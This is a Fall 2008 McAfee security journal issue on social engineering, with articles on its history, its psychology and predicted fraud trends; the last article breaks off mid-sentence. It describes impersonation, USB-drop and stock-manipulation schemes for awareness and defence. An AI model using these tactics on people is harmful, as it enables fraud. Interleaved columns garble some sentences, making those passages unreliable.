Trojans, Click Fraud, and Money Appeals Are Just a Few of the Vectors That Help Malware Writers Take Advantage of Internet Users Mcafee Security Journal Fall 2008

Home , Click farm, Trojan horse (business), WinFixer, Zango (company)

Security Vision from McAfee® Avert® Labs Fall 2008

Social Engineering The World’s Leading Security Threat

Trojans, click fraud, and money appeals are just a few of the vectors that help malware writers take advantage of Internet users McAfee Security Journal Fall 2008

Editor Contents Dan Sommer

Contributors Anthony Bettini Hiep Dang Benjamin Edelman Elodie Grandjean 4 The Origins of Social Engineering From Odysseus’ Trojan horse to Jeff Green phishing on the Internet: Deception just won’t go away. By Hiep Dang Aditya Kapoor Rahul Kashyap 9 Ask and You Will Receive The psychology of social engineering: Markus Jacobsson Karthik Raman Why does it work? By Karthik Raman Craig Schmugar 13 Social Engineering 2.0: What’s Next Click fraud appears one of the Statistics most likely threats that we’ll face in the near future. By Markus Jakobsson Toralv Dirro Shane Keats 16 The Beijing Olympics: Prime Target for Social Engineering Malware David Marcus The five rings, and other major events, are an irresistible attraction for François Paget malware authors. By Elodie Grandjean Craig Schmugar

22 Vulnerabilities in the Equities Markets Can hackers make money Illustrator from Patch Tuesday and other company news? By Anthony Bettini Doug Ross

28 The Future of Social Networking Sites Lots of money and users make Design social sites another magnet for malware. By Craig Schmugar PAIR Design, LLC

31 The Changing Face of Vulnerabilities Social engineering tricks can Acknowledgements lead users into holes in software. By Rahul Kashyap Many people helped create this issue of the McAfee Security Journal. We 34 Typosquatting: Unintended Adventures in Browsing Incautious web would like to cite a number of the key contributors: the senior executives at browsing can lead to the unexpected. By Benjamin Edelman McAfee, Inc. and McAfee Avert Labs who have supported this creation; our 38 Whatever Happened to Adware and Spyware? Tougher laws may review board—Carl Banzhof, Hiep Dang, have tamed adware, but PUPs and Trojans remain. By Aditya Kapoor David Marcus, Craig Schmugar, Anna Stepanov, and Joe Telafici; our 44 Statistics How risky are top-level domains? By David Marcus authors and their managers and teammates who have supported them with ideas and comments; marketing mavens Cari Jaquet, Mary Karlton, Beth Martinez, and Jennifer Natwick; public relations pros Joris Evers, his worldwide team, and Red Consultancy Ltd.; our design agency, Pair Design; our printer, RR Donnelley; and Derrick Healy and his mates in our Cork, Ireland, localization office, which has translated this publication into many languages. Thanks to all; we couldn’t have achieved this without you!

Dan Sommer Editor

Like it? Hate it? Send your comments to Security_Journal@mcafee.com.

‘McAfee Security Journal’ Debuts

By Jeff Green

Welcome to the first issue of the McAfee Security Journal. We kick off with a look back at the history of deception. Then We call this a first issue, but we’re not really producing this pub- we peer into the psychology of why these attacks work. Next lication for the first time. We have renamed the journal that we we look ahead to how social engineering might evolve during have, until recently, called (depending on the country you read the next few years. The 2008 Olympics in Beijing have ended, it in) McAfee Sage or the McAfee Global Threat Report. In the but malware authors once again attempted to fool sports fans McAfee Security Journal, you’ll find the same outspoken attitude into visiting bogus web sites. Is it possible to make money in the as well as all the dynamic content you have come to expect stock market by timing events such as Microsoft’s Patch Tuesday from the best researchers and authors in computer security or spoofing company news? Our extensive research will offer an research: the experts at McAfee® Avert® Labs. In this issue, answer. What’s next with social networking sites? Will security we take aim at the most insidious and pervasive of all threat tighten up, or are they doomed to be easy targets because of vectors—social engineering. overly trusting users? We’ll also look at how malware writers attack software vulnerabilities and take advantage of typosquat- Free Tibet! New images of World War 3! IRS Tax Break Secrets! ting—the exploitation of incorrectly typed web requests. Our New Gas Saving Technologies! Cheap Medication Online! final article will answer the question “Whatever happened to adware and spyware?” We’ll finish off with some statistics that The list could easily go on, but we hope the point is clear. Effec- show the varying degree of threats to top-level domains around tive and seductive messaging is critical to the success of malware the world. writers and identity thieves today, and more so now than ever before. Social engineering, however, as a method of bilking We hope you find this issue as challenging and thought provok- someone is certainly not new. It has existed since humans have ing as we do. Thanks for joining us once again as we journey into been communicating with one another. You have something I the depths of computer security. want. I want to talk you into giving it to me or into doing something I want you to do. Social engineering is possibly the most difficult of all threats to combat due to the human element. The easiest way to steal someone’s identity might just be to ask for it. Jeff Green is senior vice-president of McAfee Avert Social engineering techniques—Ponzi schemes, confidence tricks, Labs and Product Development. He has worldwide pyramid schemes, simple fraud, phishing, or spam—all follow responsibility for McAfee’s entire research organiza- similar paths. Some of these attacks are physical, while others are tion, located throughout the Americas, Europe, and digital, but all have elements in common. They have the same Asia. Green oversees research teams focused on viruses, hacker/targeted attacks, spyware, spam, aim and in many cases may even use the same techniques. The phishing, vulnerabilities and patches, and host and goal of them all is to manipulate victims through a “bug” in the network intrusion technologies. He also leads human hardware. They all create scenarios that are designed to long-term security research to ensure that McAfee persuade victims to release information or perform an action. stays ahead of emerging threats. We have assembled another outstanding collection of researchers and authors to analyze and illustrate this topic for you. We’ve even broken new ground for our journal: this issue marks the first time we have guest contributors. We start with two of the finest: Dr. Markus Jacobsson of the Palo Alto Research Center and Professor Benjamin Edelman of the Harvard Business School.

FALL 2008 3 The Origins of Social Engineering

By Hiep Dang

One would be hard pressed today to read a news article or book about computer security without coming across the term social engineering more than once.

Popularized by Kevin Mitnick (arguably the most infamous social punished mortals by withholding fire. However, in yet another engineer in the modern computing era), social engineering is in act of social engineering against Zeus, Prometheus stole “the essence the art of persuasion—convincing individuals to disclose far-seen gleam of unwearying fire in a hollow fennel stalk” from confidential data or perform some action. Although social engi- Mount Olympus and bequeathed it to man. As punishment for neering is a contemporary term, the techniques and philosophies his acts, Prometheus was chained to a rock, where every day behind it have been around as long as humanity itself. We find an eagle would come and eat his liver, which would grow back stories of deception and manipulation in the pages of history, again at night. As a punishment for man, Zeus created the first folklore, mythology, religion, and literature. woman, Pandora, who brought with her a jar that she opened out of curiosity, releasing countless plagues. Prometheus: The God of Social Engineering? Jacob and Rebekah’s Phishing Attack From the Old Testament comes the story of Jacob and his mother, According to Greek mythology, humanity’s proficiency in social Rebekah, who used a social engineering technique that is the engineering today is probably a direct result of its greatest foundation of today’s phishing attacks—making the victim mentor: Prometheus, who was so skilled in this craft that he believe that the phisher is someone else. Jacob’s father and could trick Zeus, the king of gods. In Theogony and Works and Rebekah’s husband, Isaac, had gone blind in the last years of his Days, the epic poet Hesiod tells the story of Prometheus, a Titan life. As he prepared for death, he instructed his oldest son, Esau, known for his wily ways and cunning tricks. He is credited for to “hunt game for me, and prepare for me savory food, such the creation of man by molding him out of clay. In what became as I love, and bring it to me that I may eat; that I may bless you known as the “Trick at Mecone,” Prometheus offered Zeus two before I die.” (Genesis 27:2– 4.) Wanting Jacob instead of Esau choices to settle a dispute between the gods and mortals. One to receive Isaac’s blessings, Rebekah devised a plan. Jacob was offering was ox meat stuffed inside an ox’s stomach, the other reluctant at first, saying “Behold, my brother Esau is a hairy man, was an ox bone covered with shining fat. One was nourishment and I am a smooth man. Perhaps my father will feel me, and I wrapped in a vile covering while the other was an inedible shall seem to be mocking him, and bring a curse upon myself choice, though visually tantalizing. Zeus chose the latter and, and not a blessing.” (Genesis 27:11–12.) In order to fool Isaac as a result, humankind would henceforth need to make sacri- into believing he was with Esau, Rebekah prepared Isaac’s meal, fices only of bones and fat to the gods, while keeping the flesh dressed Jacob in Esau’s best garments, and attached a goat skin for themselves. Angered at being tricked by Prometheus, Zeus to the smooth parts of Jacob’s hands and neck. Jacob delivered the meal to Isaac, passed the authentication test, and successfully gained the blessings that had been intended for Esau.

4 McAFEE SECURITY JOURNAL Samson and Delilah: Espionage for Hire O wretched countrymen! What fury reigns? Samson was a biblical figure with tremendous strength who battled the Philistines. The secret of his power was his long hair. What more than madness has possess’d your brains? While in Gaza, Samson fell in love with Delilah. The Philistines Think you the Grecians from your coasts are gone? were able to convince her to uncover the secret of Samson’s strength by offering her 1,100 pieces of silver. “Coax him, and And are Ulysses’ arts no better known? find out what makes his strength so great, and how we may This hollow fabric either must inclose, overpower him, so that we may bind him in order to subdue him; and we will each give you eleven hundred pieces of silver.” (Judg- Within its blind recess, our secret foes; es 16:5.) Samson resisted disclosing his secret before succumbing Or ‘t is an engine rais’d above the town, to her persuasiveness. “How can you say, ‘I love you,’ when your heart is not with me?” she said. “You have mocked me three T’ o’erlook the walls, and then to batter down. times now and have not told me what makes your strength so Somewhat is sure design’d, by fraud or force: great.” Finally, after she had nagged and pestered him day after day, he gave in. So he said to her, ”A razor has never come upon Trust not their presents, nor admit the horse. my head; for I have been a Nazirite to God from my mother’s womb. If my head were shaved, then my strength would leave me; I would become weak, and be like anyone else.” (Judges 16:15–17.) Soon after Samson fell asleep, Delilah exploited his The Trojans’ poor judgment became their downfall. That night, vulnerability by shaving off his hair. In his weakened state, the led by Odysseus, the Greek soldiers hidden within the horse Philistines seized Samson, gouged out his eyes, bound him in killed the guards and opened the gates to the rest of the army. shackles, and imprisoned him for life. Thanks to the ingenious social engineering tactic devised by Odysseus, the Greeks defeated the Trojans to win the war. The First Trojan Horse Today’s Trojan Horse The story of the Trojan horse, made famous by the Greek epic poet Homer in The Odyssey and the Roman epic poet Virgil in When Odysseus devised his scheme to infiltrate Troy, little did he The Aeneid, was one of the most ingenious social engineering know that he would set a precedent for millennia to come. The tricks in the history of humankind. During the Trojan War, the most prevalent type of malware found in the wild today, the Greeks could not break down the walls surrounding the city silicon “Trojan horse” was coined by Daniel Edwards of the U.S. of Troy. The crafty Greek warrior Odysseus devised a ruse to Government’s National Security Agency in the 1970s. Edwards fool the Trojans into believing the Greeks had given up their named it after the social engineering technique used by the assault on the city. The Greeks sailed their fleet of ships away Greeks. Before the days of the Internet, personal computer users and left only a large wooden horse on the beach with a lone who wanted to share software files did so through physical media Greek soldier named Sinon. After being captured by the Trojans, (such as floppy disks or tape drives) or by connecting to bulletin Sinon told them that the Greeks had left the large wooden board systems (BBS’s). Hackers with malicious intent soon realized horse as an offering to the Gods to ensure their safety as they that they could entice users into executing malicious code simply traveled home and that they made it large enough so that the by disguising it as a game or utility. Due to the simplicity and Trojans could not move it into the city—as this would bring the amazing effectiveness of Trojans, malware authors still use this Greeks ill luck. The story was so tantalizing to the Trojans that social engineering technique decades later. Today, PC users are they moved the wooden horse within the city walls—despite tricked into infecting themselves with Trojans at an alarming rate. the warnings of Cassandra, who was cursed with the ability to They are drawn by the allure of free music, videos, software, and foresee the future without anyone ever believing her, and of endearing ecards from anonymous “loved ones.” Laocoön, a Trojan priest, who said in The Aeneid:

FALL 2008 5 Malware and PUP growth Unique families from years 1997 to 2007 in thousands

140 130 120 110 100 Viruses and bots Trojans 90 PUPs 80 70 60 50 Figure 1: The frequency of malware and potentially unwanted 40 programs in McAfee’s signature files has seen several spikes in 30 the last decade. In 1998, virus generators came on the scene; 20 in 2003 to 2004, mass mailers became popular; in 2004 to 10 2005, robot networks were on the rise; and in 2006 to 2007 0 Trojans took off. 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007

An Updated Con

Advanced Fee Fraud, better known as the Nigerian Email Scam an extremely wealthy Spanish prisoner who needs someone’s (419 Fraud), has been around for decades and is still one of the help in getting free. This so-called prisoner relied on the con art- most prolific types of spam. The numeral “419” refers to the sec- ist to raise enough money to free him. The con artist approached tion of the Nigerian Criminal Code that outlaws this scam. This the victim with the story and “allowed” him or her to help with “get rich quick” social engineering tactic arrived in the form of a a portion of the fundraising—with the promise of great financial letter and was first delivered to postal mailboxes in the 1970s. gain. We see numerous variations of the letter today, but the The con evolved into unsolicited faxes through the 1980s, and it concept remains the same. The Nigerian Email Scam lures its vic- is almost exclusively sent via email today. Its origins date back to tims with the tantalizing promise of a multimillion-dollar payout the sixteenth century, when it was known as the Spanish Prisoner with an “investment” of only a few thousand. Even though most Con. The scheme is straightforward: A naïve victim is told about recipients realize the offer is too good to be true, an estimated 1 percent of recipients still reply. According the U.S. Secret Service, the scammers successfully social engineer their victims out of an average of $100 million per year.

6 McAFEE SECURITY JOURNAL Phishing reports In thousands

Unique phishing reports 40 New phishing sites

20 Figure 2: Phishing reports show steady growth, but the 10 number of new phishing sites has jumped dramatically in the past two years. (Source: 0 Anti-Phishing Working Group) Nov May Nov May Nov May Nov May Nov 2003 2004 2004 2005 2005 2006 2006 2007 2007

Phishing

The term phishing was coined by hackers. It derives from fishing They started sending fake emails and instant messages that because this social engineering technique lures its victims (phish) appeared to come from AOL support. Many unsuspecting victims into disclosing their user names, passwords, credit card numbers, gave away their information and were subsequently billed for and other personal information. In the 1990s, many hackers the activities and purchases that the hackers made on their com- exploited America Online’s (AOL) free trial offers of Internet ser- promised accounts. Malicious hackers soon realized the potential vice by using fake, autogenerated credit card numbers that didn’t profit margin and success rate of such an attack and started actually correspond to existing accounts. After AOL improved its targeting companies (banks, eBay, Amazon, and others) that security and credit card validation tests to ensure that credit card conducted transactions and commerce online. numbers were indeed legitimate, the bad guys started going after real user names and passwords to get onto AOL’s networks.

FALL 2008 7 History of computer security

Trojan Horses start McAfee Avert Labs became showing up on BBS’s the industry’s first global AV Emergency Response Team ARPANET (precursor to the The Internet is formed Internet) is created from ARPANET The first phishing attack is devised Spam (unsolicited email) appears to steal AOL user passwords Creeper (the first soon after the Internet was made computer virus) is available to the public Today, McAfee Avert Labs protects released on ARPANET customers from viruses, worms, Trojans, John von Neumann publishes Dr. Frederick Cohen publishes spyware, PUPs, vulnerabilities, spam, his theory of Self-Reproducing “Experiments with Computer Virus” phishing, malicious domains, network Automata and credits Leonard Adleman with intrusions, and host intrusions coining the term computer virus

1948 1965 1969 1971 1978 1980 1982 1983 1984 1986 1988 1995 1996 2000 2002 2008

The Morris Worm Elk Cloner (the first (the first self-replicating Apple virus) is released worm) is released Kevin Mitnick publishes “The Electronic Mail The first public Bulletin Board Brain (the first PC Art of Deception,” describing (email) is created System (BBS) is set up virus) is released his mastery of social engineering

John Draper (aka Cap’n Crunch) The movie “War Games” Spyware and adware start to discovers toy whistle in the cereal dramatizes the consequences become a household name box can be used to phone phreak of hacking

Figure 3: Timeline of significant social engineering events.

History Repeats Itself

Whether it’s called social engineering, trickery, confidence tricks, Hiep Dang is the Director of Anti-malware Research cognitive biases, or scams, the concept of exploiting a person’s for McAfee Avert Labs. He is responsible for the coordination of McAfee’s global team of malware naivety and trust is as prevalent today as it has been since the researchers dedicated to the research, analysis, and dawn of time. Ask security experts, and they will agree that response to malware outbreaks, including viruses, people are the weakest link in the security chain. We can develop worms, Trojans, bots, and spyware. Dang is a regular the most secure software to protect our computers, implement contributor to Avert Labs blogs and white papers and the most restrictive security policies, and strive for utopian user writes for the McAfee Security Journal. He has been interviewed by the Wall Street Journal, MSNBC, PC education. However, as long as we continue to be driven by curi- Magazine, and many other publications and media osity and greed without concern for the consequences, we could outlets about new threats and malware trends. Dang face our own version of a Trojan tragedy. is also a devoted practitioner of Wah Lum Tam Tui Northern Praying Mantis Kung Fu and Tai Chi. He is Progress, far from consisting in change, depends on reten- currently on a hiatus from his lifetime of training to tiveness. When change is absolute, there remains no being concentrate on the computer security industry. to improve and no direction is set for possible improvement: and when experience is not retained, as among savages, infancy is perpetual. Those who cannot remember the past are condemned to repeat it.—George Santayana, in “Reason in Common Sense,” from The Life of Reason.

works cited • Anderson, J. P. (1972). Computer Security Technology Planning Study vol. II. • Homer. The Iliad. (Translated by S. Butler) U.S. Air Force. • Mitnick, K. (2002). The Art of Deception. Indianapolis, Indiana: Wiley Publishing. • Farquhar, M. (2005). A Treasury of Deception. New York: The Penguin Group. • Myers, M. J. (2007). Phishing and Countermeasures. John Wiley & Sons, Inc. • Hesiod (1914). Theogony. (Translated by H. G. Evelyn-White) • Santayana, G. (1905). The Life of Reason. • Hesiod (1914). Works and Days. (Translated by H. G. Evelyn-White) • Virgil (19 B.C.E.). The Aeneid. (Translated by J. Dryden)

8 McAFEE SECURITY JOURNAL Ask and You Will Receive

By Karthik Raman

In January 2007, cybercriminals used social engineering tactics to carry out the world’s biggest online theft on record, stealing US $1.1 million from customers of the Swedish Nordea Bank.

Customers received an email that appeared to have originated A Tale of Two Brains from Nordea Bank, and 250 of them downloaded and installed the “anti-spam” software that the email asked them to set The human brain is arguably the most complex system in the up. The anti-spam software was in fact a Trojan that collected universe. Part of its complexity lies in its complicated layout and customer information, which the criminals used to log into the convoluted interaction of subsystems. bank’s web site and steal money.1 In the brain, emotions seem to arise from the older, inner parts, A well-known information security principle is that in any such as the amygdala, and reasoning from newer, outer parts, security system, people are the weakest link. Although security such as the neocortex.3 But the seats of emotion and reason are attacks and the defenses developed to respond to those attacks not mutually exclusive, as Isaac Asimov observed in his book continue to evolve, human nature remains unchanged. To an The Human Brain:4 attacker, social engineering is more efficient and brings quicker returns than a brute-force assault on encryption algorithms, Emotions do not arise from any one small part of the fuzzing to find new software vulnerabilities, or adding com- brain, it would appear. Rather, many parts, including the plexity to malware. In the Nordea Bank fraud, it was easier for frontal and temporal lobes of the cortex, are involved— criminals to ask the bank’s customers to install a Trojan than to in a complex interplay. break into a vault to steal cash. The parts of the brain responsible for emotion and reason can We are gullible, greedy, and curious, which means social engi- sometimes work with or against one another. That is why it is neers can manipulate our feelings and thoughts. They ask us for hard for us to keep reason and emotion separate, and why it something, and very often they receive it. But why do we behave is easy for emotion to override reason when the two contradict this way? one another. In pioneering work on the psychology of security, renowned Let’s look at how we deal with fear, for example. Examining how security expert Bruce Schneier identified four research areas— we react to imminent danger, science writer Steven Johnson points behavioral economics, psychology of decision-making, psychology out that the fear response is “an orchestral mix of physiological of risk, and neuroscience—that can help explain why our feeling instruments launching with masterful speed and precision”:5 of security deviates from reality.2 This edition of the McAfee Security Journal and this article in particular focus on one aspect We talk about it colloquially as the fight-or-flight response. of security: social engineering. In this discussion, we shall draw Feeling it kick in is one of the best ways to experience your from neuroscience, the psychology of decision making, and brain and body as an autonomous system, operating indepen- elementary social psychology to analyze why people fall for social dently of your conscious will. engineering without perceiving the deception.

FALL 2008 9 When revisited by the conditions that led to a fight-or-flight response in the past, we allow the emotional response to take over even though we can reason objectively that the response Dishonest politicians, spies, and con men is without merit. know that appealing to emotion—fear Dishonest politicians, spies, and con men know that appealing especially—to elicit an emotional response to emotion—fear especially—to elicit an emotional response is a very effective means to their ends. Social engineers continue is a very effective means to their ends. that tradition. Social engineers continue this tradition.

Theories of Social Engineering Manipulating emotions Many social engineers zero in on the emotions of fear, curiosity, greed, and sympathy. It is well-established that these are univer- Although we must recognize that our heuristics are fallible, we sal emotions; from time to time everyone feels afraid or curious cannot function without them. Our lives would be too difficult if or greedy or sympathetic. we had to think through everything we perceived, said, and did. We desperately need our mental shortcuts. Psychologist Robert Fear and curiosity are useful in many situations. Escaping a Cialdini explains this need:9 burning building is a good thing. Curiosity can help us challenge ourselves and learn something new. Still, acting out of fear or We can’t be expected to recognize and analyze all the aspects curiosity can cause us to do dangerous or undesirable things.6 in each person, event, and situation we encounter in even one Some attacks can be carried out even without the presence of day. We haven’t the time, energy, or capacity for it. Instead, the social engineer by manipulating a victim’s curiosity. In April we must very often use our stereotypes, our rules of thumb, 2007, a banking Trojan planted in USB drives was left in a to classify things according to a few key features and then London parking lot. People who were curious to see what these to respond mindlessly when one or another of these trigger drives contained and likely glad to become owners of a free stor- features is present. age device, plugged the drives into their computers only to infect Let’s see how social engineers can elicit automatic responses in us them with malware.7 that work for them. Attackers who threaten or blackmail victims manipulate their fear. The GPCoder.i Trojan, which appeared in June 2008, is an Triggering cognitive biases example of malware that manipulated fear: it encrypted users’ A cognitive bias is a mental error caused by a simplified information- files and demanded a ransom for their decryption.8 Likewise, processing strategy.10 When a heuristic goes wrong, it becomes attackers who bribe victims manipulate their greed, and attackers a bias. Social engineers nudge our heuristics into “severe and who pose as needing help manipulate their sympathy. systematic” errors.11 Misdirected mental shortcuts Here are a few cognitive biases that can explain social engineering: Sometimes social engineers will appeal to something outside of • Choice-supportive bias People will remember an option of our emotions. They’ll try to trip up our mental rules for process- their choosing in the past as having more positive than nega- ing information. We call these rules heuristics, or rules of thumb. tive aspects.12 An online shopper could get used to purchasing discounted items on the Internet using referrals from friends. An occasional spam email could seem like another referral and lead the shopper into disclosing credit card information to a fraudulent web site. • Confirmation bias People will collect and interpret evidence in a way that confirms their views.13 Let’s take a hypotheti- cal example. Suppose Acme Corporation contracts with Best Printers to maintain its printers, and all Best Printer service people wear gray, full-sleeved shirts with name badges. Over time, Acme’s employees will get used to seeing Best Printers

10 McAFEE SECURITY JOURNAL service people in their uniforms and will identify anyone with act domineering when coercing victims into doing something. gray, full-sleeved shirt with a badge as a custodian. A social Victims may not realize that their interlocutors are actors and engineer could fabricate or steal a Best Printers uniform to that their behavior is situational—a means to an end. pose as a service person. The social engineer may not be chal- • Salience effect Given a group of individuals, people will guess lenged to identify himself because of the Acme employees’ that the most or least influential person is the one who stands confirmation bias. out the most.20 Social engineers are expert at fitting into their • Exposure effect People like things (and other people) accord- surroundings and blending in. They strive to flip the salience ing to how familiar they are with them.14 News of natural effect to their favor. They might pose as a client in a business and man-made disasters often spawn phishing web sites that suit or a custodian in overalls, but not as a juggler on stilts. exploit this sentiment.15 People exposed to such news could be Blending in is not limited to clothing and appearance—it can enticed easily into visiting phishing web sites that claim to have extend to knowledge of company lingo, events, employees, a connection with the news. Finally, people’s exposure to the and even regional accents. A social engineer from California news might have lowered their guard with respect to the mali- trying to breach a company in Boston may know about “Jill’s” cious nature of the web site they are visiting. new baby and “Josh’s” leaving the company for a competitor and may exchange this with the receptionist in a Boston accent • Anchoring People focus on an identifying trait that is first apparent when they make decisions about something.16 A to be allowed into the office for “IT repairs.” spoofed bank web site that prominently displays the actual • Conformity, compliance, and obedience People respond bank’s logo might deceive users even if other security indica- to the pressures of conformity, compliance, and obedience tors scream out the deception.17 by changing their behavior. Many social engineering attacks can be explained by victims’ predictable responses to these Causing errors in schemas pressures. A social engineer might pretend to be a visiting Social psychologists define a “schema” as the picture of reality executive and prevail upon a young security guard to let her we refer to, so that we can draw conclusions about our environ- enter the premises in spite of the fact that she is not wear- ment. As children, we learn that being nice to others is a good ing a badge. (The attacker’s promise of reward or threat of thing. The notorious social engineer Kevin Mitnick has remarked punishment may further pressure the guard). The guard may that attackers know this and craft a request to victims to “sound feel overwhelmed and will obey. Group social engineering so reasonable that it raises no suspicion, all the while exploiting attacks have not been observed, but they are conceivable. A the victim’s trust.”18 Thus, social engineers abuse the design of number of social engineers might pose as legitimate employ- our social schema. ees and nag a receptionist to gain entry into an office by repeating “Don’t waste our time” or “Let us get back to our Here’s a list of common social errors or judgments that people work.” The receptionist might just let them in to avoid being make, with illustrations of how social engineers exploit them: unpopular. A different technique that spies are known to • Fundamental attribution error People will assume that the use is to socialize with a victim for a while. The attacker at behaviors of others reflect their stable, internal characteris- first requests innocent information from the victim and then tics.19 This is the error of mistaken first impressions. A social moves onto sensitive information. The victim is trapped; he is engineer will train diligently to make a favorable first impres- pressured to comply with the next request, given his history sion. Attackers could act personable when making requests or of compliance, or risks a form of blackmail.

FALL 2008 11 Conclusion

Our susceptibility to social engineering is rooted in the design of We can’t change human nature. We are born with a split between the human brain, in the complex interplay between the centers our emotions and reason, and are prone to committing mental of emotion and reason. Social engineering is the manipulation errors. This is normal, but such behavior is dangerous when of a victim’s fear, curiosity, greed, or sympathy. Cognitive biases exploited by social engineers. By understanding the psychology of and errors in our social schemas help explain social engineering’s social engineering and training users about its effects, we can success. So why is this knowledge so valuable to us? defend against these attacks with greater success. In the 2007 CSI Computer Crime and Security Survey, only 13 percent of respondents said they had checked how effective their employees’ training was against social engineering attacks.21 Although 13 percent is a low figure, the survey did not include those respondents who did not have any training program for Karthik Raman, CISSP, is a Research Scientist social engineering attacks. at McAfee Avert Labs. His research interests in security include vulnerability analysis, network One obvious step is to create and improve security policies and security, and software security. Beyond security, his user education programs about social engineering. Any policy interests include the cognitive and social sciences on social engineering will be more persuasive if it uses scien- and computer programming. For fun, Raman plays cricket and the guitar and learns languages. Raman tific research to justify itself. User education materials will also graduated with B.S. degrees in computer science be more effective if they list the cognitive biases that social and computer security from Norwich University engineers generally exploit, and training videos will be more (Vermont) in 2006. effective if they demonstrate attacks that exploit each of our cognitive biases.

endnotes 1 “Bank loses $1.1M to online fraud,” BBC (2007). http://news.bbc.co.uk/2/hi/ 13 nickerson, R. S. “Confirmation Bias: A Ubiquitous Phenomenon in Many business/6279561.stm Guises,” Review of General Psychology, Vol. 2, No. 2, 175-220 (1998). 2 schneier, B., “The Psychology of Security,” Essays and Op Eds (2007). http:// http://psy.ucsd.edu/~mckenzie/nickersonConfirmationBias.pdf www.schneier.com/essay-155.html 14 Zajonc, R. B. “Attitudinal Effects of Mere Exposure,” Journal of Personality and 3 Ibid. Social Psychology, 9, 2, 1-27 (1968). 4 asimov, I. “The Human Brain: Its Capacities and Functions.” New York: Mentor 15 Kaplan, D. “Virginia Tech massacre may spawn phishing scams,” SC Magazine Books, 1965. (2007). http://www.scmagazineuk.com/Virginia-Tech-massacre-may-spawn- 5 johnson, S. “Mind Wide Open: Your Brain and the Neuroscience of Everyday phishing-scams/article/105989/ Life.” New York: Scribner, 2004. 16 Tversky, A. & Kahneman, D. “Judgment under uncertainty: Heuristics and 6 svoboda, E. “Cultivating curiosity; how to explore the world: Developing a sense biases,” Science, 185, 1124-1130 (1974). Available at . today.com/articles/index.php?term=pto-4148.html 17 Dhamija, R., Ozment, A., Schecter, S. “The Emperor’s New Security Indicators: 7 leyden, J. “Hackers debut malware loaded USB ruse,” The Register (2007). An evaluation of website authentication and the effect of role playing on us- http://www.theregister.co.uk/2007/04/25/usb_malware/ ability studies” (2008). http://www.usablesecurity.org/emperor/ 8 McAfee VIL: GPCoder.i, June 9, 2008. http://vil.nai.com/vil/content/v_145334.htm 18 Mitnick, Kevin D., Simon, William L. “The Art of Deception.” Indianapolis: Wiley 9 cialdini, R. “Influence: The Psychology of Persuasion.” New York: HarperCollins, Publishing, Inc., 2002. 1998. 19 gilbert, D. T., & Malone, P. S. “The correspondence bias,” Psychological Bulletin, 10 Heuer, Richard J., Jr. “The Psychology of Intelligence Analysis,” Center for the 117, 21–38 (1995). http://www.wjh.harvard.edu/~dtg/Gilbert%20&%20Ma- Study of Intelligence, CIA (2002). http://www.au.af.mil/au/awc/awcgate/ lone%20(CORRESPONDENCE%20BIAS).pdf psych-intel/art12.html 20 Taylor, S.E. and Fiske, S.T. “Point of view and perception so causality,” Journal of 11 Tversky, A. and Kahneman, D. “Judgment under uncertainty: Heuristics and Personality and Social Psychology, 32, 439-445 (1975). biases,” Science, 185, 1124-1130 (1974). http://psiexp.ss.uci.edu/research/ 21 computer Security Institute, CSI Computer Crime and Security Survey (2007). teaching/Tversky_Kahneman_1974.pdf http://www.gocsi.com/forms/csi_survey.jhtml (registration required) 12 Mather, M., Shafir, E., and Johnson, M. K. “Misrememberance of options past: Source monitoring and choice,” Psychological Science, 11, 132-138 (2000). http://www.usc.edu/projects/matherlab/pdfs/Matheretal2000.pdf

12 McAFEE SECURITY JOURNAL Social Engineering 2.0: What’s Next

By Markus Jakobsson

Although social engineering has probably been around since the dawn of human civilization, many are concerned that it is currently transforming and wreaking havoc on the Internet. In this article, we’ll offer some predictions about what may come next.

Few would disagree that the current crimeware wave is fed by Defenses Shape Attacks economic incentives. The current state of affairs stands in stark contrast with the past. Early viruses were simply an expression of From the point of view of criminals, Internet fraud is a relatively intellectual curiosity, competitiveness, and maybe a bit of ennui. safe and comfortable crime. Apart from being a crook’s tele- The case is even clearer as we turn to click fraud and phishing. commuting dream, Internet fraud offers scalability, high profits, What other possible motivation is there other than to make a and very low traceability—and thus very limited risk. It is no shady buck or two? (Or often a whole lot more.) The same holds wonder that Internet fraud has taken off. Now to understand for spam in its various forms. If spammers couldn’t make money the attacks, we must also understand the defenses. It is clear from it, there would be no spam. It is, therefore, rational to that the crimes are being fought on three separate planes today: consider the ways that criminals can monetize abuses of existing technical features (such as anti-virus software, spam filters, and Internet features so that we can predict trends in fraud. anti-phishing browser plug-ins); educational campaigns (such as those run by FTC, eBay, SecurityCartoon.com, banks, and the Carnegie Mellon University Usable Privacy and Security Labora- Internet Fraud: A Socio-Technical Crime tory (CUPS) group); and finally, by legal means. The legal efforts An increasing number of experts recognize that fraud is no longer typically involve tracking origination, raiding drop boxes, and only a technical matter, but that to an increasing extent there is finally, prosecuting offenders. also a social engineering component. Phishing is a prime example Whereas the technical and educational efforts—if successful— of this, but not the only one. It is more and more common these result in a lower yield to criminals, the legal efforts result in a days to see crimeware attacks that hinge on social engineering for higher risk. These risks are a big deal, especially given how well installation. A recent example of this is the so-called Better Internet fraud scales. It is, therefore, fair to assume that the next Business Bureau scam, shown in Figure 1. In this phishing attack, frontier in Internet crime will involve a component that makes it a potential victim receives an email appearing to come from the less traceable. We will make that assumption here, and investigate Better Business Bureau and relating to a case against the organiza- what that could mean for the future. We will do this by consider- tion of the recipient. The attachment, which supposedly contains ing two types of highly untraceable attacks, neither of which has the details of the complaint, in reality contains a Trojan down- occurred to date, but both of which are waiting to happen. But loader. To make matters worse, these emails are often sent to first, to truly understand the importance of the legal aspect, we people high up in the targeted organization—often to individuals will take a slight tangent and review why “ransomware” never who deal with customer complaints on a daily basis. became the calamity people thought it would be.

FALL 2008 13 Ransomware Fails And what would happen if someone were to open or execute the attached file? Assuming that the email would not end up in In the late 1990s, researchers at Columbia University posited that the spam folder in the first place and that the anti-virus system the next wave of malware might attempt to hold the files on the would not catch it, we would have an infection—on a computer victim’s computer hostage by encrypting them using a public key with access to sensitive data or to the corporate web site. What carried in the malware body and demand a ransom to get the if some of that sensitive data were to make its way onto the secret key—to regain access to the encrypted files. Years later, Internet, maybe even onto the web site of the company itself? the Archiveus Trojan carried out an attack just like that, although There would be a public uproar, and the stock price would suffer. with a small difference: it used symmetric-key cryptography Then the criminal would exercise his or her put options, cash- instead of a public key. The attack was foiled when the Trojan ing in on the previous bet that the stock of the company would was reverse engineered and the encryption/decryption key was go down in value. Doing so does nothing to make the attacker extracted and distributed to anybody who was attacked. But traceable, as every investor with put options would be in the same maybe the Archiveus attack would not 